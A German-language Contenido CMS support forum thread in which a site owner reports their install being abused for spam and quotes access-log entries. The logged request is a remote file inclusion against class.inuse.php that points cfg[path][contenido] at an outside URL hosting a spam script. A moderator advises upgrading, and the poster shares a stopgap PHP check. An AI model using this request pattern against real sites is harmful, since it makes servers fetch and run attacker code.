Hallo zusammen,
mein Provider (all-inkl) machte mich darauf aufmerksam, dass Contenido bei mir als Spam-Server missbraucht wurde.
Der Spammer benutzt dazu die Datei /contenido/classes/class.inuse.php
Mittels POST wird wohl die Variable cfg[path][contenido] neu gesetzt.
Hier ein Auszug aus den Log-Dateien (<xxx> ist meine Domain):
"POST
/contenido/classes/class.inuse.php?cfg[path][contenido]=http://www.corey.kit
.net/http.txt? HTTP/1.0" 200 108050
"http://<xxx>/contenido/classes/class.inuse.php?cfg[path][co
ntenido]=http://www.corey.kit.net/http.txt?" "Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.0)"
Unter der Adresse http://www.corey.kit.net/http.txt wartet dann ein Spamscript das auf meinem Server ausgeführt wird.
Wie kann ich das verhindern? Durch einen Referrer-Check?
Contenido als Spam-Server missbraucht!
Vor relativ kurzer Zeit wurde eine Suche im Forum integriert (das muss so beim Aufsetzen des Forums gewesen sein, so vor 6 oder mehr Jahren...). Verblüffenderweise ist diese gut versteckte Funktion über den Link "Suche" rechts oben auf der Seite verfügbar.
Davon mal abgesehen, ist/war eine V4.5.x nur eine Entwicklungsversion, die nicht produktiv genutzt werden sollte. Aktualisiere auf die V4.6.8 (in der das Problem schon länger gelöst ist), am Besten auf das Paket von rezeptionist, siehe Misc V4.6.
Gruß
HerrB
Davon mal abgesehen, ist/war eine V4.5.x nur eine Entwicklungsversion, die nicht produktiv genutzt werden sollte. Aktualisiere auf die V4.6.8 (in der das Problem schon länger gelöst ist), am Besten auf das Paket von rezeptionist, siehe Misc V4.6.
Gruß
HerrB
Bitte keine unaufgeforderten PMs oder E-Mails -> use da Forum!
Newsletter: V4.4.x | V4.6.0-15 (Module, Backend) | V4.6.22+
Standardartikelliste: V4.4.x | V4.6.x
http://www.contenido.org/forum/search.php | http://faq.contenido.org | http://www.communido.net
Newsletter: V4.4.x | V4.6.0-15 (Module, Backend) | V4.6.22+
Standardartikelliste: V4.4.x | V4.6.x
http://www.contenido.org/forum/search.php | http://faq.contenido.org | http://www.communido.net
ok, danke.HerrB hat geschrieben:Vor relativ kurzer Zeit wurde eine Suche im Forum integriert (das muss so beim Aufsetzen des Forums gewesen sein, so vor 6 oder mehr Jahren...). Verblüffenderweise ist diese gut versteckte Funktion über den Link "Suche" rechts oben auf der Seite verfügbar.
Davon mal abgesehen, ist/war eine V4.5.x nur eine Entwicklungsversion, die nicht produktiv genutzt werden sollte. Aktualisiere auf die V4.6.8 (in der das Problem schon länger gelöst ist), am Besten auf das Paket von rezeptionist, siehe Misc V4.6.
Gruß
HerrB
Der Suche-Knopf nützt mir leider nicht viel, wenn ich nicht die richtigen Suchbegriffe weiß...
Kurzfristig überbrücke ich das Problem so:
Code: Alles auswählen
if (isset($_REQUEST["cfg"]))
{
print("Achtung Spammer auf .... " + var_export($_REQUEST, true));
mail("xxxxxx@gmx.de", "Achtung Spammer auf xxx", var_export($_REQUEST, true));
exit;
}